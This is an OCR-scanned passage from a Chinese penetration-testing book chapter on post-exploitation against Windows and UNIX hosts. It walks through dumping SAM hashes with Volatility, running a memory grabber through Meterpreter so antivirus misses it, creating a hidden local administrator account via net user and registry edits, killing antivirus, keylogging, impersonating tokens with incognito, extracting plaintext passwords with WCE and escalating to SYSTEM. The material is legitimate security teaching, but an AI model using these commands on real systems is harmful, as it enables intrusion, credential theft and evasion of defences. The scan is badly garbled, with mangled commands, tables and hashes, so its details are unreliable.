毁坏 目标 。 这 个 术语 已 经 流传 下 来 ， 特 指 当 一 个 系统 被 攻占 后 ， 攻 击 者 完成 偷窃 和 修改 个 人 财产 以 及 财务 数据 的 行为 。 


之 后 ， 攻 击 者 聚焦 在 第 二 目标 一 一 系统 文件 ， 利 用 这 些 系统 文件 提供 的 信息 来 支持 另外 的 攻击 。 第 二 目标 的 文件 的 选择 依 
赖 于 目标 的 操作 系统 。 举 个 例子 来 滴 ， 如 果 系 统 是 UNIX， 那 么 攻击 者 就 会 把 下 列 文件 作为 工作 目标 : 


系统 和 配置 文件 (通常 在 目录 /etc 下 ,但 也 可 能 在 /usr/local/etc， 或 者 是 其 他 位 置 )。 
:密码 文件 (/etc/password 和 /etc/shadow) . 

-配置 文件 和 在 .ssh 目录 中 的 公 钥 和 私 钥 。 

可 能 包含 在 .gnupg 里 的 公 钥 和 私 钥 环 。 

电子 邮件 和 数据 文件 。 


在 Windows 系 统 中 ， 攻 击 者 会 将 以 下 文件 作为 攻击 目标 : 


可 被 用 来 提取 口令 、 加 密 密 钥 等 的 系统 内 存 。 
AREE 


.安全 账号 管理 (Security Accounts Manager, SAM) 数据 库 ， 包 含 口令 的 可 以 
在 $SSYSTEMROOTSNrepairNSAM 与 $SSYSTEMROOTSNSYStem32 \configNRegBaCKNSAM 中 找到 WE 


任何 用 于 加 密 的 口令 文件 或 者 种 子 文件 。 
电子 邮件 和 数据 文件 。 


apes rins 查 包 含 临 时 项 目的 文件 夹 。 举 个 例子 ，UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet 
Files\ 可 能 包含 让 人 感 兴趣 的 文件 、 图 片 、 和 cookies。 


如 上 所 述 ， 这 些 系统 内 存 包 售 了 大 量 的 攻击 者 可 以 利用 的 信息 。 因 此 ， 它 通 弟 是 一 个 你 需要 优先 获取 的 文件 。 系 统 内 存 可 以 


从 几 个 来 源 下 载 ， 下 载 文件 是 一 个 独立 的 映射 文件 ， 这 些 来 源 如 下 : 


通过 上 传 一 个 工具 到 被 攻击 的 系统 然后 直接 复制 内 存 (这些 工 具 包 括 Belkasoft RAM capturer、MandiantMemoryze 和 


MonsolsDumpIt) 
通过 复制 Windows 冬 眠 文件 hibezfiT， sys， 然 后 利用 Volatility 来 解密 和 分 析 文 件 。Volatility， 在 Kali 中 Forensics 闻 单 中 可 以 找 
到 ， 是 一 个 分 析 内 和 存 的 框架 ， 内 存 可 以 来 目 系统 RAM， 以 及 其 他 包含 系统 内 存 的 文件 。 它 依赖 于 写 在 Python 中 的 插件 来 分 析 内 存 和 提取 数 


据 ， 这 些 数据 包括 加 密 密 钥 、 口 令 、 注 册 信息 ， 以 及 其 他 相关 信息 。 
通过 复制 一 个 虚拟 机 ， 然 后 将 VMEM 文 件 转化 为 内 存 文件 。 


人 如果 你 上 传 一 个 设计 的 程序 ， 在 被 攻击 的 系统 中 来 抓 取 内 存 ， 有 可 能 这 个 特殊 的 应 用 会 会 被 共 毒 软件 识别 为 恶意 软件 。 大 多 数 的 杀毒 软件 能 
识别 散 列 签 名 和 内 存 获 取 软 件 的 行为 ， 如 果 物 理 内 存 的 敏感 数据 有 人 说 泄露 的 风险 ， 它 就 会 通过 拉 啊 警报 来 保护 物理 内 存 的 敏感 数据 。 获 取 软 件 
将 被 隔离， 目标 会 收 到 一 个 关于 这 个 攻击 的 警告 报警 。 


为 了 避免 这 种 情况 的 友 生 ， 用 Metasploit 框 染 ， 使 用 命令 来 运行 在 目标 内 存 中 的 可 执行 文件 ， 


这 个 命令 如 下 : 


meterpreter> execute -H -m -d calc.exe -f «memory 


executable + parameters» 


前 面 执行 的 命令 calc.exe 是 一 个 假 的 可 执行 文件 ， 但 是 ， 实 际 上 上 传 了 内 存 获取 执行 文件 ， 并 在 它 的 进程 空间 中 运行 。 


这 个 可 执行 文件 并 不 显示 在 程序 列表 中 ， 例如 任务 管理 器 (Task Manager) ， 并 且 使 用 数据 取证 技术 的 检测 更 加 困难 ， 因 为 它 并 不 写 到 人 硬盘 
中 。 此 外 ， 它 会 避 开 系统 的 杀毒 软件 ， 因 为 它 一 般 不 在 内 存 空间 去 搜索 恶意 软件 。 


物理 内 存 一 旦 被 下 载 ， 利 用 Volatility 框 架 ， 内 存 就 可 以 被 分 析 ，Volatility 框 架 是 设计 来 取证 、 分 析 内 存 的 一 系列 Python 上 及 
本 。 如 果 操 作 系 统 支 持 ，Volatility 将 会 扫描 内 存 文件 并 提取 下 列 内 容 : 


-图片 信息 和 系统 数据 ， 充 分 到 可 以 将 映像 与 源 系 统 联 系 在 一 起 。 
运行 进程 、DLL、 线 程 、 套 接 字 、 连 接 和 模块 。 
开放 的 网 络 套 接 字 和 连接 ， 最 近 打 开 的 网 络 连 接 。 


:内存 地 址 ， 包 括 物理 的 和 虚拟 的 内 存 映 射 。 
， 现 在 它 已 经 很 容易 被 攻击 ， 而 且 很 容易 将 这 


:LM/NTLM 散 列 和 LSA 私 钥 。LanMan (LM) 口令 散 列 是 微软 保护 口令 的 初衷 。 这 么 多 年 过 去 了 些 
散 列 恢复 成 实际 的 口令 。NT LanMan (NTLM) 是 最 新 的 抵抗 攻击 的 散 列 。 然 而 ， 它 们 通常 和 NTLM 版 本 一 起 存储 ， 
ie 权威 (Local Security Authority, LSA) 存储 的 密 钥 是 本 地 的 口令 : 远程 访问 〈 有 线 的 和 无 线 的 ) 、VPN、 自 动 登录 口令 ， 

。 任 何 存储 在 系统 的 口令 都 是 脆弱 的 ， 特 别 是 当 用 户 重 复 使 用 口令 时 。 


-特定 的 正则 表达 式 或 字符 串 存储 在 内 存 中 。 

对 一 个 被 恶意 软件 Zeus 感 染 的 系统 中 的 样本 图 片 
(https://code.google.com/p/volatility/wiki/SampleMemorylmages) , 
散 列 值 。 


我 们 将 用 Volatility 框 架 来 获取 加 密 的 LanMan 口 令 


第 一 步 束 是 确定 映像 和 操作 系统 的 类 型 ,命令 如 下 : 


root@kali:usr/share/volatility# python vol.py imageinfo -f 
/root/Desktop/zeus.vmem 


上 述 命令 的 执行 结果 如 图 5.4 所 示 。 


Volatile Systems Volatility Framework 2.2 
Determining profile based on KDBG search... 


Suggested Profile(s) 


XPSP2x86) 
AS Layerl : JKIA32PagedMemoryPae (Kernel AS) 
AS Layer? : FileAddressSpace (/root/Desktop/zeus.vmem) 
PAE type : PAE 
DTB : 0x319800L 
KDBG : O0x80544ca0 
Number of Processors : 1 
Image lype (Service Pack) : 2 
KPCR for CPU O : OxffdTfOGO 
KUSER SHARED DATA : OxffdfOOG0 
Image date and time : 2010-08-15 19:1/:56 UTC+0000 
Image local date and time : 2010-08-15 15:17:56 -0400 


图 5.4 使 用 Volatility 框 架 获取 操作 系统 类 型 


当 执 行 下 列 命 令 时 ，hivelist 揪 件 将 对 不 同 的 hives 注 册 表 打印 出 初始 的 虚拟 内 存 位 置 


root@kali:usr/share/volatility#python vol.py hivelist -f 
/root/Desktop/zeus.vmem 


WinXPSP2x86, WinXPSP3x86 (Instantiated with Win 


述 命 令 的 执行 结果 如 图 5.5 所 示 。 


root(ükali 


# python vol.py hivelist -f /root/Desktop/zeus.vmem 


Volatile eration Volatility Framework 2.2 


Virtual 


iil setae 


Name 


Oxelc 49008 OxO36dc008 \Device\HarddiskVoLumel\Documents and Settings\LocalService\Local 
settings\Application Data\Microsoft\Windows\UsrClass.dat 
Oxelc41b60 OxG4010b60 \Device\HarddiskVoLumel\Documents and Settings\LocalService\NTUSE 


R.DAT 


0xela39638 0x021eb638 \Device\HarddiskVolumel\Documents and Settings\NetworkService\Loc 
al Settings\Application Data\Microsoft\Windows\UsrClass.dat 


0xela33008 
SER.DAT 

Oxe]153ab60 
0xe1542008 
9xo153/b60 
0xel544008 
0xel3ae580 
OxelOlbOO8 


为 了 取出 散 列 值 ， 


OxO1T98008 


OxG5b7db60 
0x06c 48008 
OxO6ae4db60 
OxO6c4b0608 
OxGlbbd580 
0x01867008 


中 ， 它 们 将 直接 用 于 密码 破坏 ， 


需要 SAM 和 SYSTEM hives 的 初始 虚拟 内 存 位 置 


\Device\HarddiskVoLumel\Documents and Settings\NetworkService\NTU 


\Device\HarddiskVoLumel \WINDOWS\system32\config\software 


\Device\HarddiskVoLumel \WINDOWS\system32\config\default 
\SystemRoot\system32\Config\SECURITY 
\Device\HarddiskVoLumel\WINDOWS\system32\config\SAM *&—— 
[no name] 

\Device\HarddiskVoLumel \WINDOWS\system32\config\system 4—— 


图 5.5 ”使 用 hivelist 插 件 获取 注册 表 的 内 存 位 置 


。 使 用 一 些 合 令 ， 可 将 这 些 结果 会 仓 到 用 逗号 分 隔 的 文件 


这 些 命令 如 下 : 


root@kali:usr/share/volatility#python vol.py hashdump -f 
/root/Desktop/zeus.vmem -y 0xe101b008 -s 0xe1544008 
>>/root/Desktop/hashdump.csv 


Eii 


令 执行 结果 如 图 5.6 所 示 。 


# python vol.py hashdump -f /root/Desktop/zeus.vmem -y 0 


xe101b008 -s 0xe1544008 
Volatile Systems Volatility Framework 2.2 
Administrator:500:e652cac65/419a9a224a3blOBT3fa6cbb5d:B8B46f /eaeeBfbl11l/adO6bddB830b/5865c : 


Guest :501:aad3b435b51404eeaad3b435b51404ee : 31d6c feOd16ae931b73c59d7e0c089c0: : 
HelpAssistant:1000:46e857c004024653cd538de64dedac36b:842b4013c45a3b8fec7/6ca54e5910581: :: 
SUPPORT 388945a0:1002: aad3b435b51404ee4aad3b435b51404ee:8f57385a61425 fc 7874c 3268aa249eal 


图 5.6 ”使 用 SAM 和 SYSTEM hives 内 存 的 屏幕 截图 


隔离 的 LM 散 列 可 能 被 Hashcat、John the Ripper, Ophcrack5RainbowTablesigfe. 


5.4 ”创建 附加 账 刻 


下 面 的 命令 是 具有 高 度 侵略 性 的 ， 通 常会 被 系统 拥有 者 在 应 急 响 应 程序 中 检测 到 。 然 而 ， 它 们 会 频 窒 地 被 一 个 攻击 者 及 用 ， 


以 此 来 转移 对 更 持久 的 访问 机 制 的 注意 ， 相 关 的 命令 参见 表 5.5。 


表 5.5 一 些 具 有 高 度 侵略 性 的 命令 


hs 


HAR 
用 attacker 作为 用 户 名 ,创建 一 个 本 地 用 户 ， 以 password 作为 密码 
添加 新 用 户 attacker 到 本 地 管理 组 。 在 某 些 情 况 下 ， 这 个 命令 是 net localgroup 


E 

节令 
net user attacker password / Add 
net localgroup administrators 


attacker /add administrators /add attacker 


( £x ) 
命令 描述 
i — | 将 一 个 不 活路 Son 户 蛮 成 活 既 用 户 。 在 一 个 小 组 i 这 样 做 全 As 吸引 注 
net user username /active:yes /| ， __ Ws 
" Ad. c EE Fa ah pag z AIRE , UH 30% Hy L ] 令 被 标记 AAS TE iri Hh TEA, x Ay 能 是 
domain A F 
增加 一 个 有 效 账 户 的 方法 
net share nameS=C:\ / a ; SUN: iras xe rud : 
分 享 C Ht, 使 其 作为 一 个 Windows H:5E, Wh? attacker HH F* ij In] 2 3 fe ee 4 UK 
grant:attacker, FULL / 
动 上 的 上 所 有 内 容 的 权力 


unlimited 


如 果 你 创建 一 个 新 的 用 户 账 户 ， 那 么 该 账户 会 被 任何 一 个 登录 进入 被 攻 击 系统 的 欢迎 界面 的 用 户 注意 到 。 为 了 使 这 个 账户 不 


， 你 需要 用 下 列 的 REG 命 令 行 修改 注册 表 : 


REG ADD 
HKEY LOCAL MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion 


\WinLogon\SpecialAccounts\UserList /V account name / 
T REG DWORD /D 0 


这 个 命令 将 修改 指定 的 注册 表 来 隐藏 用 户 账户 QN) 。 基 于 目标 的 特别 的 操作 系统 版 本 ， 会 有 一 些 特别 的 语法 要 求 ， 


X apy 


此 ， 首 先 得 确定 Windows 版 本 ， 并 且 在 攻击 目标 之 前 ， 在 一 个 可 控 的 环境 中 验证 它 。 


5.5 ”使 用 Metasploit 工 具 进 行 后 期 渗透 活 去 


Metasploit 被 用 来 支持 渗透 和 后 期 渗透 利用 活动 。 目 前 的 版 本 包括 大 约 200 个 模块 ， 模 块 简化 了 后 期 利用 活动 。 我 们 将 讨论 
一 些 最 重要 的 模块 。 


在 下 面 的 屏幕 截图 中 ， 我 们 成 功 地 渗透 了 一 个 Windows XP 系统 (一 个 “经 典 ” 的 攻击 ,经 党 被 用 来 验证 Meterpreter 的 复 
ARIE) 。 第 一 步 下 是 直接 侦察 网 络 和 家 攻击 系统 。 


切 始 的 meterpreter shell， 在 一 段 时 间 内 是 脆弱 的 和 易 受 攻击 的 。 因 此 ， 一 旦 一 个 系统 入 渗透 ， 我 们 将 移动 这 个 shell， 然 
后 将 其 和 一 个 更 加 稳定 的 进程 绑 定 在 一 起 。 这 样 也 会 使 得 渗透 更 难 航 检测 到 。 


在 meterpreter 的 提示 下 ， 输 入 ps 来 获得 一 系列 的 运行 进程 ， 如 图 2.7 所 示 。 


ps 命令 会 返回 每 个 进程 的 完整 路 径 。 在 图 5-7 中 ， 这 点 被 忽略 了 。 ps 列表 标明 c: \windows\Explorer.EXE 正 在 运行 。 在 这 
个 特殊 的 例子 中 ， 它 被 识别 为 ID 为 1460 的 进程 ， 如 图 5.8 所 示 。 由 于 这 是 一 个 稳定 的 应 用 ， 我 们 将 把 shell 移 动 到 这 个 进程 中 。 


既然 我 们 和 远程 系统 有 了 一 个 稳定 的 shell 连 接 ， 我 们 将 用 meterpreter 脚 本 来 支持 后 期 入 侵 利用 活动 。 


我 们 必须 确认 的 第 一 个 事实 是 : 我 们 是 否 在 一 个 虚拟 机 上 ? 使 用 meterpreter， 打 开 受 损 系统 和 攻击 者 之 间 的 会 话 ， 执 行 
run checkvm 命 令 ， 如 图 5.9 所 示 。 返 回 的 数据 表明 ， 这 是 一 个 VMware 虚拟 机 。 


PID PPID Name Arch Session User 

© © [System Process] 4294967295 

4 () System x86 © NT AUTHORITY\SYSTEM 

396 628  J logon.scr x86 © RWBEGGS -1E690867XAdministrator 
512 4 smss.exe x86 © NT AUTHORITY\SYSTEM 

604 512 csrss.exe x86 g NT AUTHORITY\SYSTEM 

52 512 winlogon.exe x86 0 NT AUTHORITY\SYSTEM 

672 628 services exe x86 g NT AUTHORITY\SYSTEM 

684 628 lsass.exe x86 Ü NI AUTHORITY\SYSTEM 

748 1764 TPAutoConnect.exe x86 g RWBEGGS-1E69067XAdministrator 
844 5/2 vmacthlp.exe x85 g NI AUITHORITTMSYSTEM 

B60 572 svchost.exe x86 Qj NT AUTHORITY\SYSTEM 

944 6/2 svchost.exe x86 g NI AUTHORITY NETWORK SERVICE 
1036 672 svchost.exe x86 o NT AUTHORITY\SYSTEM 

1080 672 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE 
112 6572 svchost.exe x86 © NT AUTHORITY\LOCAL SERVICE 
1208 1035  wscntfy.exe x86 © RWBEGGS -1E69867XAdministrator 
1264 672 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM 

142 1036  wuauclt.exe x86 e RWBEGGS-l1E69067XAdministrator 
1460 1440 explore~.exe x86 © RWBEGGS -1E6806 /XAdministrator 
1544 672 spoolsv.exe x86 © NT AUTHORITY\SYSTEM 

1680 1460  vmtoolsd.exe x86 g RWBEGGS -1E69067XAdministrator 
1808 672 alg.exe x86 Q NT AUTHORITY\LOCAL SERVICE 
19/6 1460 cmd.exe x86 Ü RWBEGGS -1E6906 /XAdministrator 
2016 672 vmtoolsd.exe x86 © NT AUTHORITY\SYSTEM 


图 5.7 使 用 meterpretetr， 输 入 ps 来 获得 进程 列表 


meterpreter > migrate 1460 
[ | Migrating from 10365 to 1460... 
|^] Migration completed successfully 3i 


图 5.8 ”将 shell 移 动 至 ID 为 1460 的 进程 


msf exploit(ms08 067 netapi) > exploit 


[*] Started reverse handler on 192.168.43.130:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP - Service Pack 3 - Lang:English 

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (/52128 bytes) to 192.168.43.128 

|*] Meterpreter session 1 opened (192.168.43.130:4444 -> 192.168.43.128:1094) 


meterpreter » run checkvm 


[*] Checking if target is a Virtual Machine ..... 
[*] This is a VMware Virtual Machine 


图 5.9 ”使 用 run checkvm 命 令 
一 些 通 过 meterpreter 使 用 的 重要 的 后 期 利用 模块 见 表 5.6。 


表 5.6 ”meterpreter 的 重要 的 后 期 利用 模块 
命令 描述 
run checkvm 确定 是 耕 有 一 个 虚拟 机 存在 
run getcountermeasure 检查 被 入 侵 系 统 的 安全 配置 ( 反 病 毒 软 件 、 防 火 墙 等 ) 


命令 


run killav 


run hostsedit 


run winenum 


Min scraper 


run upload 和 run download 


run keyscan start, 


keyscan stop 和 run keyscan 


dump 
run getprivs 
run getsystem 


run hashdump 
run getgui 


run vic 


摘 述 
禁用 大 部 分 的 运行 在 被 感染 系统 上 的 反 病 毒 服 务 。 这 种 脚本 经 党 是 过 时 的 ， 它 成 功 
E Pn jee F 5j] 3 = ie HE: 
允许 攻击 者 对 Windows 的 HOSTS 文件 添加 条 目 。 这 样 可 以 将 网 络 卡 转 到 一 个 不 同 
im. Mia T 图 x 这 样 可 以 下 载 男 外 的 工具 ， 或 者 确保 反 病 毒 软件 无 法 连接 到 
互联 网 或 者 本 地 服务 各 ， 使 攻击 者 获得 签名 的 更 新 
执行 一 个 仙人 rts 54 WMIC 特征 化 一 个 已 入 侵 的 系统 。 它 从 注册 表 和 LM mm 
技 储 重要 的 键 
收集 其 他 脚本 尚未 获取 的 、 全 面 的 信息 ， 比 如 完整 的 Windows 注册 表 信 息 
允许 攻击 者 在 目标 系统 上 ， 上 传 和 下 载 文件 


在 入 侵 系 统 中 ， 开 启 和 关闭 本 地 键盘 记录 。 完 成 后 ,将 收集 的 文本 数据 存储 到 攻击 
fi HY 系统 EF 


REKATA APR de [o n SERE. pOMHETHBORAE T H 

试图 将 权限 提升 到 Windows 系统 水 平 ， 给 用 户 最 大 程度 的 I—- "i 

将 SAM 数据 库 中 的 内 容 转 me cha ESSE 

允许 用 户 局 用 RDP (getgui -e) JF E HIP HI (getgui -u). gettelnet 脚本 可 上 
以 同样 的 方式 运行 


针对 被 感染 的 系统 ， 向 攻击 者 提供 一 个 远程 GUI (VNC) 


Windows enumerator (winenum) 是 最 有 效 的 meterpreter 脚 本 之 一 。 如 图 5.10 所 示 ， 它 同时 使 用 命令 行 和 WMIC 来 获 


得 目标 系统 的 全 面 表征 。 


meteors - run winenum 


L| a L k u a H B 5 L| a LI a u n ia F a [| E a a E [.] E E a Gi 


Running Windows Local Enumeration Meterpreter Script 

New session on 192.168.43.128:445., 

saving general report to / root / .msfA/logs/scripts/winenuül 

Output of each individual command is saved to /root/.msf| 

Checking if RwWBEGGS-IE6906/ is a Virtual Machine 
UAC is Disabled 

Running Command List 


running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 


running 


command 
command 
command 
commana 
commana 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 


netstat 
netstat 


-vb 
-ns 


net accounts 
route print 


net view 


netstat 


-nao 


ipconfig /displaydns 


ipconfig /all 


arp -a 


cmd.exe /c set 
tasklist /svc 


net group administrators 
net view /domain 
netsh firewall show config 


net 
net 
net 
net 
net 
net 


localgroup administrators 
localgroup 

user 
group 
share 
session 


gpresult /SCOPE USER /Z 
j gpresult /SCOPE COMPUTER /Z 


图 5.10 ”使 用 winenum 的 屏幕 截图 


除了 枚 举 之 外 ，winenum 脚 本 还 可 以 转 储 注册 表 信息 ， 收 集 系统 用 于 解密 的 散 列 值 ， 如 图 5.11 所 示 。 


running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 
running 


command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 
command 


Running WMIC Commands 


wmic 
wmic 
wmic 
wmic 
wmic 
win ic 
wmic 
wmic 
win ic 
win ic 
win ic 
wmic 
wmic 
wmic 


share get name,path 

nteventlog get path,filename,writeable 

netlogin get name,lastlogon,badpasswordcount 
netclient list brief 

netuse get name,username,connectiontype,localname 
logicaldisk get description,filesystem,name,size 
volume list brief 

service list brief 

group list 

useraccount list 

gfe 

product get name,version 

rdtoggle List 


running startup list full 


Extracting software list from registry 
Dumping password hashes... 

Hashes Dumped 

Getting Tokens... 

ALL tokens have been processed 

Done! 


Er Een, 


图 5.11 使 用 wmic 的 屏幕 截图 


meterpreter 还 有 一 些 有 用 的 、 支 持 复 杂 功 能 的 库 。 例 如 ，espia 库 支持 通过 如 下 命令 对 入 侵 系 统 进行 截图 : 


meterpreter> use espia 
Loading extension espia ... success. 
meterpreter» screenshot /Desktop/target.jpeg 


Screenshot saved to: /root/xsWoDDbW.jpeg 


stdapi 库 允许 远程 攻击 者 通过 操作 摄像 头 ， 从 受 感染 的 系统 中 收集 音频 和 视频 ， 并 且 将 这 些 数据 返回 给 攻击 者 。 


5.6 ”在 已 入 侵 主机 上 提升 用 户 权 限 


通常 ， 很 有 可 能 获得 一 个 系统 的 Guest 或 User 访 问 权限 。 攻 击 者 获得 重要 信息 的 能 力 ， 将 受到 降低 的 权限 级 别 的 限制 。 因 此 
一 个 常见 的 后 期 利用 行为 是 将 访问 权限 从 Guest 级 别 不 断 提 升 到 User， 再 到 Administrator， 最 后 到 SYSTEM 级 别 。 这 种 提升 访 
问 权限 的 方式 通常 被 称 作 垂 直 升 级 (vertical escalation) 。 


用 户 可 以 通过 一 些 技术 来 获得 高 级 访问 赁 证， 包括 以 下 几 个 方法 : 
使 用 网 络 嗅 探 器 、 键 盘 记 录 器 ， 来 捕获 传送 的 用 户 赁 证 Cdqsniff 可 以 用 来 分 离 正 在 进行 的 传输 中 的 密码 ， 或 者 从 Wireshark 或 tshark 会 话 
中 保存 的 一 个 pcap 文 件 ) 。 


-对 本 地 存储 的 密码 进行 一 个 检索 。 有 些 用 户 收 集 电 子 邮 件 文件 来 的 密码 (经 当 被 称 为 password) ， 由 于 密码 重复 使 用 ， 简 单 的 密码 系统 是 
很 常见 的 ， 所 以 找到 那些 密码 ， 并 在 升级 的 过 程 中 使 用 。 


NirSoft (www.nirsoft.net) 开发 了 几 款 免费 的 工具 ， 可 以 上 传 到 入 侵 系 统 中 ， 使 用 meterpreter 从 操作 系统 和 缓存 密码 的 
应 用 程序 (邮件 应 用 程序 、 远 程 访问 软件 、FTP 和 网 络 浏览 器 ) 中 分 离 出 密码 。 


" a MC 诸如 hobocopy、fgdump、pwdump【〔 使 用 meterpreter 将 它们 上 传 到 目标 系统 ) 等 应 用 程序 来 转 储 SAM 和 SYSKEY 文 


使 用 类 似 process injector (www.tarasco.org/security/Process Injector/) 的 工具 ， 直 接 将 恶意 代码 注入 系统 级 运行 服务 中 。 


- 当 一 些 应 用 程序 加 载 时 ， 它们 使 用 特殊 的 顺序 恋 取 动态 链接 库 (dynamic link library, DLL) 文件 。 创 建 一 个 与 合法 DLL 同 名 的 假 DLL 
文件 是 可 能 的 ， 把 它 放 在 一 个 特定 的 目录 位 置 ， 让 应 用 程序 加 载 并 执行 它 ， 最 终 实 现 攻击 者 的 权限 提升 。 一 些 应 用 程序 容易 受到 DLL 劫持 
(www.exploit-db.com/dll-hijacking-vulnerable-applications/) 。 


-使 用 利用 缓冲 区 溢出 ， 或 其 他 手段 来 提升 权限 的 渗透 方式 。 
通过 meterpreter 执 行 getsystem 脚 本 ， 目 动 地 将 管理 员 权 限 提升 到 系统 级 别 。 


Rinds 7 和 Windows 200845 JE VT 0EAN SET ERI AS AUT BIET UAE, 例如 ADMIN$、C$ 等 。 这 些 共享 可 能 需要 meterpreter 肢 


本 ， 例 如 incognito， 或 支持 SMB 上 的 攻击 。 为 了 解决 这 个 问题 ， 将 l l 
HKEY LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Svystem 加 入 注册 表 ， 并 增加 一 个 新 的 名 字 为 


LocalAccount TokenFilterPolicyHJDWORD (32-bit) 键 ， 并 将 值 设 为 1。 


5.7 ”使 用 incognito 重 放 身份 验 证 令 牌 
incognito 是 一 个 特别 有 趣 的 meterpreter 库 ， 它 允许 你 伪造 和 重 放 用 户 令 牌 。 令 牌 是 临时 密 钥 ， 它 允许 你 在 不 提供 密码 或 
其 他 凭证 的 前 提 下 ， 访 问 网 络 和 系统 资源 。 这 些 令 牌 将 持续 存在 一 个 系统 中 ， 除 非 系统 重新 启动 。 


一 旦 你 入 侵 了 一 个 系统 ， 在 不 需要 破译 密码 的 前 担 下 ， 融 可 以 使 用 令 牌 去 冒充 生成 设 令 牌 的 用 记 。 这 些 伪造 令 牌 允许 攻击 者 
提升 他 们 的 权限 。 


在 提示 符 下 ， 输 入 以 下 内 容 : 


use incognito 


前 面 这 个 命令 的 执行 结果 ， 如 图 5.12 所 示 。 


Incognito Commands 


Command Des inis md 

add group user Attempt to add a user to a global group with all tokens 
add localgroup user Attempt to add a user to a Local group with all tokens 
add user Attempt to add a user with all tokens 

impersonate token Impersonate specified token 

list tokens List tokens available under current user context 

snarf hashes onarf challenge/response hashes for every token 


图 5.12 4£JfJincognito 


第 一 步 是 确定 被 感染 系统 上 存在 的 所 有 有 效 的 令 牌 。 你 可 以 看 到 令 牌 的 个 数 ， 取 决 于 你 最 初 入 侵 目 标 系 统 所 使 用 的 访问 级 
别 。 

你 将 看 到 两 种 类 型 的 令 牌 ， 如 下 图 5.13 所 示 。 授 权 令 和 脾 (delegation tokens) 支持 交互 式 登 录 (例如 ， 登 录 到 一 个 本 地 系 
统 ， 或 通过 远程 朱 面 进行 交互 ) 。 模 拟 令 牌 是 非 交 互 的 会 话 ， 例 如 当 系 统 连 接 到 一 个 网 络 驱动 器 。 


preter > list tokens -u 
Warning: Mot currently running as SYSTEM, not all tokens will be available 
Call rev2self if primary process token is SYSTEM 


EIE Bd i Ss Bs Bs Pi Bs ss Rs Ee Ms Se Be i Ss se Ses Bs sl Ss Ps i ss a i ee ss a ens Rs Bs Ss Sr sd i es ms Es a 


RWBEGGS - 1E6905 /XAdministrator 


Impersonation Tokens Available 


No tokens available 


图 5.13 ”使 用 令 牌 列表 
正如 你 所 看 到 的 ， 一 个 授权 令 有 牌 已 经 被 标识 为 一 个 系统 管理 员 。 如 果 我 们 可 以 伪造 这 个 令 脾 我们 就 可 以 拥有 它 的 特权 。 


当 在 incognito 中 调用 mpersonate token 命 令 时 (如 图 5.14 所 示 ) ， 注 意 这 两 个 反 斜 杠 在 命令 中 是 必要 的 。 


meterpreter > \impersonate token RWBEGGS-1E6906/\\Administrator 

[-] Warring: Not currently running as SYSTEM, not all to«ens will be available 
Call rev2self if primary process token is SYSTEM 

[+] Delegation token available 

[+] Successfully impersonated user RWBEGGS-1E69067XAdministrator 


图 5.14 使 用 授权 令 牌 


现在 ， 如 果 我 们 在 meterpreter 提 示 符 下 运行 shell 命 令 并 输入 whoami， 系 统 将 会 认定 我 们 是 伪造 令 牌 的 那个 系统 管理 员 。 


5.7.1 使 用 Windows 攒 据 编 辑 器 操作 访问 凭据 


Windows} fates (Windows Credential Editor, WCE, & 
见 http://www.ampliasecurity.com/research/wcefaq.html) ， 是 一 个 精简 的 incognito 的 脚本 。 它 有 32 位 和 64 位 的 版 本 ， 以 
及 一 个 企 所 有 Windows 平 台 上 通用 的 “通用 版 ”。W5CE 人 允许 用 户 执行 以 下 操作 : 


在 Windows 系 统 上 执行 pass-the-hash 攻 击 。 

:从 系统 存储 器 上 收集 NTLM 和 凭证 (使 用 或 没 使 用 代码 注入 。) 

“从 Windows 系 统 中 收集 Kerberos 票 据 。 

使 用 从 其 他 Windows 或 UNIX 系 统 上 获得 的 Kerpberos 票 据 获 取 访问 权限 。 
-由 Windqows 系 统 转 储 明 文 密码 〈 见 下 文 ) 。 


在 meterpreter 命 令 提示 符 下 使 用 WCE， 将 executable 上 传 到 被 感染 的 系统 中 。 然 后 初始 化 一 个 交互 式 的 shell 并 执行 
WCE。 正 如 你 在 图 5.15 中 看 到 的 ，-w 选 项 很 容易 提取 了 明文 管理 员 密码 。 


meterpreter > shell 

Process 3868 created. 

Channel 2 created. 

Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 


c:i\>woe.exe -w 

wCe.exe -w 

WCE vl.4lbeta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by! 
Hernan Ochoa (hernanüampliasecurity.com) | 
Use -h for help. 


DigitalDefence\RWBEGGS - 1E69067 :darkstar 
Administ rator\RWBEGGS -1E6906/: 
NETWORK SERVICE\WORKGROUP : 


图 5.15 使 用 WCE 一 w 选 项 提取 密码 


5.7.2 ”从 管理 员 升 级 到 系统 管理 员 


系统 管理 员 权 限 人 允许 攻击 者 创建 和 管理 账户 ， 访 问 系统 上 大 部 分 有 效 数 据 。 然 而 ， 一 些 复杂 的 功能 任务 ， 要 求 请 求 者 具有 系 
统 (SYSTEM) 级 别 的 访问 权限 。 有 几 种 方法 可 以 实现 将 特权 升级 到 系统 级 别 。 最 常用 的 方法 是 用 at 命 令 ， 它 是 Windows 为 一 
个 特定 的 时 间 分 配 任务 的 命令 。at 命 令 总 是 在 系统 级 权限 上 运行 。 


使 用 一 个 交互 式 的 shell (在 meterpreter 命 令 提 示 符 下 输入 shell) ， 打 开 一 个 命令 提示 符 ， 并 确定 被 感染 系统 的 本 地 时 间 。 
如 果 时 间 是 下 午 12: 50 (该 功能 采用 24 小 时 计时 法 ) ， 在 稍 晚 的 时 间 安 排 一 个 交互 式 的 命令 shell， 如 图 5.16 所 示 。 


当 at 任 务 指定 好 运行 时 间 后 ， 在 meterpreter 命 令 提示 符 下 ， 再 次 确认 一 下 你 的 访问 权限 ， 如 图 5.17 所 示 。 


C:\eat 12:51 /interactive cmd 
